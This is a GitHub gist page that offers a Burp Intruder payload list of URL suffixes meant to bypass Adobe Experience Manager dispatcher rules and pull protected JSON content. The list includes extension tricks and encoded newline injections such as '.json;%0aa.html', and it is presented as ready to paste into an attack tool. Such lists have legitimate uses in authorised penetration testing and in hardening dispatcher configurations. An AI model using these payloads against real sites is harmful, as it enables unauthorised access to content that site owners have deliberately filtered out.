Skip to content

Instantly share code, notes, and snippets.

@thomashartm
Last active August 9, 2021 06:03
Show Gist options
  • Save thomashartm/d6fb03900f49e127ba5bb840313e8254 to your computer and use it in GitHub Desktop.
Save thomashartm/d6fb03900f49e127ba5bb840313e8254 to your computer and use it in GitHub Desktop.
Burp Intruder payload lists for AEM content grabbing URL suffixes to bypass dispatcher rules. Just copy the list into your intruder options.
.json
.1.json
.json/a.css
.json/a.html
.json/a.ico
.json/a.png
.json/a.gif
.json/a.1.json
.json;%0aa.css
.json;%0aa.html
.json;%0aa.js
.json;%0aa.png
.json;%0aa.ico
.4.2.1...json
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment